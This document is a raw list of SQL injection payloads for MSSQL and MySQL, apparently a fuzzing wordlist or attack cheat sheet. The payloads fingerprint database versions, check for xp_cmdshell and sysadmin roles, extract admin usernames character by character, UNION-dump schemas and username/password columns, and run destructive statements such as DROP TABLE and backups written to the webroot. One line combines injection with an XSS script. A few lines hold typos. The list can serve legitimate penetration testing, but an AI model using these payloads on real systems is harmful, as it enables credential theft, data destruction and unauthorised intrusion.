AND DB_NAME()>0
AND USER>0
;BACKUP DATABASE DB_NAME TO DISK='C:\INETPUB\WWWROOT\1.DB';--
AND 1=(SELECT @@VERSION)
AND 1=CONVERT(INT,@@VERSION)--
AND 1=(SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE = 'X' AND NAME ='XP_CMDSHELL')
AND 0 <> DB_NAME(N)
AND 1=CONVERT(INT,DB_NAME())--
;BACKUP DATABASE DB_NAME TO DISK='C:\INETPUB\WWWROOT\SAVE.DB'
TEMP ;CREATE TABLE TEMP(ID NVARCHAR(255),NUM1 NVARCHAR(255),NUM2 NVARCHAR(255),NUM3 NVARCHAR(255));--
;DELETE FROM TEMP;--
AND (SELECT TOP(1) ID FROM TESTDB.DBO.TEMP)>0
AND (SELECT COUNT(*) FROM MASTER.DBO.SYSDATABASES WHERE NAME>1 AND DBID=6) <>0
AND (SELECT COUNT(*) FROM TESTDB.DBO.TABLE_NAME)>0
AND 1=(SELECT IS_SRVROLEMEMBER('SYSADMIN'))
'SA'=(SELECT SYSTEM_USER)
;USE MODEL--
AND 0<>(SELECT COUNT(*) FROM MASTER.DBO.SYSDATABASES WHERE NAME>1 AND DBID=6)--
AND (SELECT TOP 1 NAME FROM TESTDB.DBO.SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 )>0
AND (SELECT TOP 1 NAME FROM TESTDB.DBO.SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 AND NAME NOT IN('XYZ'))>0
AND (SELECT TOP 1 NAME FROM TESTDB.DBO.SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 AND NAME NOT IN('XYZ',''))>0
AND (SELECT TOP 1 NAME FROM TESTDB.DBO.SYSOBJECTS WHERE XTYPE='U' AND STATUS>0 AND NAME NOT IN('XYZ','',''))>0
AND (SELECT COUNT(*) FROM TABLE_NAME）<5
AND 1=(SELECT IS_SRVROLEMEMBER('SYSADMIN'));--
AND 1=(SELECT IS_SRVROLEMEMBER('SERVERADMIN'));--
AND 1=(SELECT IS_SRVROLEMEMBER('SETUPADMIN'));--
AND 1=(SELECT IS_SRVROLEMEMBER('SECURITYADMIN'));--
AND 1=(SELECT IS_SRVROLEMEMBER('DISKADMIN'));--
AND 1=(SELECT IS_SRVROLEMEMBER('BULKADMIN'));--
AND 1=(SELECT IS_MEMBER('DB_OWNER'));--
AND (SELECT COUNT(*) FROM TABLE_NAME)>0
AND (SELECT TOP 1 COL_NAME(OBJECT_ID('TABLE_NAME'),1) FROM SYSOBJECTS)>0
AND (SELECT TOP 1 LEN(USERNAME) FROM ADMIN)=1
AND (SELECT TOP 1 ASCII(SUBSTRING(USERNAME,2,1)) FROM ADMIN)=77
;CREATE TABLE TABLE_NAME (COLUMN1 INT,COLUMN2 VARCHAR(10));--
;INSERT INTO TABLE_NAME (COLUMN1,COLUMN2) VALUES ('VALUE1','VALUE2');--
UPDATE TABLE_NAME SET COLUMN1='VALUE1' WHERE A = B
DELETE FROM TABLE_NAME WHERE A = B
DROP TABLE TABLE_NAME
CREATE TABLE FOO( LINE VARCHAR(8000))
;CREATE TABLE DIRS(PATHS VARCHAR(100), ID INT)
;AND (SELECT TOP 1 PATHS FROM DIRS)>0
;AND (SELECT TOP 1 PATHS FROM DIRS WHERE PATHS NOT IN('PATHS'))>)
;CREATE TABLE TEMP(ID NVARCHAR(255),NUM1 NVARCHAR(255),NUM2 NVARCHAR(255),NUM3 NVARCHAR(255));--
AND ORD(MID(VERSION(),1,1))>51
UNION SELECT 1,1,1,1
ORDER BY 13
UNION SELECT 1,2,3,4 FROM ADMIN
UNION SELECT 1,VERSION(),3,4 FROM ADMIN
UNION SELECT 1,USERNAME,3,4 FROM ADMIN
UNION SELECT 1,USERNAME,3,4 FROM ADMIN WHERE ID=2
AND ORD(MID(USER(),1,1))=144
AND 1=1 UNION SELECT 1,2,3,4,5
AND 1=2 UNION SELECT 1,2,3,4,5
AND 1=2 UNION ALL SELECT VERSION()
AND 1=2 UNION ALL SELECT DATABASE()
AND 1=2 UNION ALL SELECT USER()
AND 1=2 UNION ALL SELECT @@GLOBAL.VERSION_COMPILE_OS FROM MYSQL.USER
AND ORD(MID(USER(),1,1))=114
AND 1=2 UNION SELECT 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1
AND 1=2 UNION SELECT 1,2,3,TABLE_NAME,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=OX123 LIMIT 0,1
AND 1=2 UNION SELECT 1,2,3,COLUMN_NAME,5,6,7,8,9,10 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=OX123 LIMIT 0,1
AND 1=2 UNION SELECT 1,2,3,USERNAME,5,6,7,PASSWORD,8,9 FROM TABLE_NAME LIMIT 0,1
UNION SELECT 1,2,3CONCAT(USERNAME,0X3C,PASSWORD),5,6,7,8,9 FROM TABLE_NAME LIMIT 0,1
AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/
